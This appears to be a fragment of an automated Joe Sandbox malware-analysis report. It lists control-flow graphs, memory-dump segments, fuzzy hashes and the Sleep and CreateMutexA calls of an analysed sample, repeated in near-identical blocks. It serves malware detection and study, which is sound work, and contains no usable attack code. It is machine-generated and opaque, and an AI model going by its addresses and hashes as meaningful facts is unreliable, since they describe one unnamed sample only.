                                                                                                                • Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 1464230837-0
                                                                                                                • Opcode ID: 3cedfc488f286cdd1926e25d68592594bef61c2b579e14d1be155162f7b199dd
                                                                                                                • Instruction ID: c970bbccfec9b1556d663781131318a17af919fa774e4a6a3cc973e305f0c535
                                                                                                                • Opcode Fuzzy Hash: 3cedfc488f286cdd1926e25d68592594bef61c2b579e14d1be155162f7b199dd
                                                                                                                • Instruction Fuzzy Hash: 71311231A14214CBEF18DB6CD8997ADB7A2EF86311F248718EC14DB2D5C77589888B72

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 973 d5a079-d5a099 977 d5a0c7-d5a0e3 973->977 978 d5a09b-d5a0a7 973->978 979 d5a0e5-d5a0f1 977->979 980 d5a111-d5a130 977->980 981 d5a0bd-d5a0c4 call d6d663 978->981 982 d5a0a9-d5a0b7 978->982 985 d5a107-d5a10e call d6d663 979->985 986 d5a0f3-d5a101 979->986 987 d5a132-d5a13e 980->987 988 d5a15e-d5a916 call d680c0 980->988 981->977 982->981 983 d5a930 982->983 991 d5a953-d5a994 Sleep CreateMutexA 983->991 992 d5a930 call d86c6a 983->992 985->980 986->983 986->985 994 d5a154-d5a15b call d6d663 987->994 995 d5a140-d5a14e 987->995 1003 d5a9a7-d5a9a8 991->1003 1004 d5a996-d5a998 991->1004 992->991 994->988 995->983 995->994 1004->1003 1005 d5a99a-d5a9a5 1004->1005 1005->1003
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000064), ref: 00D5A963
                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00DB3254), ref: 00D5A981
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 1464230837-0
                                                                                                                • Opcode ID: f9ae7e6a2461663ac376c9a2fec4dc124e3894aa382b9035a19bb33f3e72f48c
                                                                                                                • Instruction ID: 3810f957bb5ec70d02a50cce21716907d053182bf53a42a89e227a5c8d44ee2e
                                                                                                                • Opcode Fuzzy Hash: f9ae7e6a2461663ac376c9a2fec4dc124e3894aa382b9035a19bb33f3e72f48c
                                                                                                                • Instruction Fuzzy Hash: 03313731B142109BEF18DBACDC85B6DB7A2DB85311F248319EC149B3D5C77599888B32

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1007 d5a1ae-d5a1ce 1011 d5a1d0-d5a1dc 1007->1011 1012 d5a1fc-d5a218 1007->1012 1013 d5a1f2-d5a1f9 call d6d663 1011->1013 1014 d5a1de-d5a1ec 1011->1014 1015 d5a246-d5a265 1012->1015 1016 d5a21a-d5a226 1012->1016 1013->1012 1014->1013 1017 d5a935 1014->1017 1021 d5a267-d5a273 1015->1021 1022 d5a293-d5a916 call d680c0 1015->1022 1019 d5a23c-d5a243 call d6d663 1016->1019 1020 d5a228-d5a236 1016->1020 1024 d5a953-d5a994 Sleep CreateMutexA 1017->1024 1025 d5a935 call d86c6a 1017->1025 1019->1015 1020->1017 1020->1019 1028 d5a275-d5a283 1021->1028 1029 d5a289-d5a290 call d6d663 1021->1029 1037 d5a9a7-d5a9a8 1024->1037 1038 d5a996-d5a998 1024->1038 1025->1024 1028->1017 1028->1029 1029->1022 1038->1037 1039 d5a99a-d5a9a5 1038->1039 1039->1037
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000064), ref: 00D5A963
                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00DB3254), ref: 00D5A981
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 1464230837-0
                                                                                                                • Opcode ID: fd5602f6d05a7ba6bd7aa16d70f16774bd765e3155caf749f8575b12776752b3
                                                                                                                • Instruction ID: 734aae922150e3f999e2ddde0548e3b9cdd2041a7e4ed6b63116edc84d367743
                                                                                                                • Opcode Fuzzy Hash: fd5602f6d05a7ba6bd7aa16d70f16774bd765e3155caf749f8575b12776752b3
                                                                                                                • Instruction Fuzzy Hash: 6F314831B043119BEF08DBACDC89B5DB7A2EB86311F248319EC149B3D1C77589888B36

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1041 d5a418-d5a438 1045 d5a466-d5a482 1041->1045 1046 d5a43a-d5a446 1041->1046 1049 d5a484-d5a490 1045->1049 1050 d5a4b0-d5a4cf 1045->1050 1047 d5a45c-d5a463 call d6d663 1046->1047 1048 d5a448-d5a456 1046->1048 1047->1045 1048->1047 1051 d5a93f-d5a949 call d86c6a * 2 1048->1051 1053 d5a4a6-d5a4ad call d6d663 1049->1053 1054 d5a492-d5a4a0 1049->1054 1055 d5a4d1-d5a4dd 1050->1055 1056 d5a4fd-d5a916 call d680c0 1050->1056 1072 d5a94e-d5a994 call d86c6a Sleep CreateMutexA 1051->1072 1073 d5a949 call d86c6a 1051->1073 1053->1050 1054->1051 1054->1053 1061 d5a4f3-d5a4fa call d6d663 1055->1061 1062 d5a4df-d5a4ed 1055->1062 1061->1056 1062->1051 1062->1061 1077 d5a9a7-d5a9a8 1072->1077 1078 d5a996-d5a998 1072->1078 1073->1072 1078->1077 1079 d5a99a-d5a9a5 1078->1079 1079->1077
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000064), ref: 00D5A963
                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00DB3254), ref: 00D5A981
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 1464230837-0
                                                                                                                • Opcode ID: a5ea0cc83c7096be40dd370dfbc78fbfad455dfc0ebc7e971494f8aa3ba6a9e9
                                                                                                                • Instruction ID: 849c5196ab0fb191bd24ae6231384c94f850d879fada24d8d92cba82c167a36a
                                                                                                                • Opcode Fuzzy Hash: a5ea0cc83c7096be40dd370dfbc78fbfad455dfc0ebc7e971494f8aa3ba6a9e9
                                                                                                                • Instruction Fuzzy Hash: F9313B31A042109BEF18DBBCD889B6DB762EF81311F248318EC549B3D5D7B589848B72

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1081 d5a54d-d5a56d 1085 d5a56f-d5a57b 1081->1085 1086 d5a59b-d5a5b7 1081->1086 1087 d5a591-d5a598 call d6d663 1085->1087 1088 d5a57d-d5a58b 1085->1088 1089 d5a5e5-d5a604 1086->1089 1090 d5a5b9-d5a5c5 1086->1090 1087->1086 1088->1087 1091 d5a944-d5a949 call d86c6a 1088->1091 1095 d5a606-d5a612 1089->1095 1096 d5a632-d5a916 call d680c0 1089->1096 1093 d5a5c7-d5a5d5 1090->1093 1094 d5a5db-d5a5e2 call d6d663 1090->1094 1108 d5a94e-d5a994 call d86c6a Sleep CreateMutexA 1091->1108 1109 d5a949 call d86c6a 1091->1109 1093->1091 1093->1094 1094->1089 1101 d5a614-d5a622 1095->1101 1102 d5a628-d5a62f call d6d663 1095->1102 1101->1091 1101->1102 1102->1096 1115 d5a9a7-d5a9a8 1108->1115 1116 d5a996-d5a998 1108->1116 1109->1108 1116->1115 1117 d5a99a-d5a9a5 1116->1117 1117->1115
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000064), ref: 00D5A963
                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00DB3254), ref: 00D5A981
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
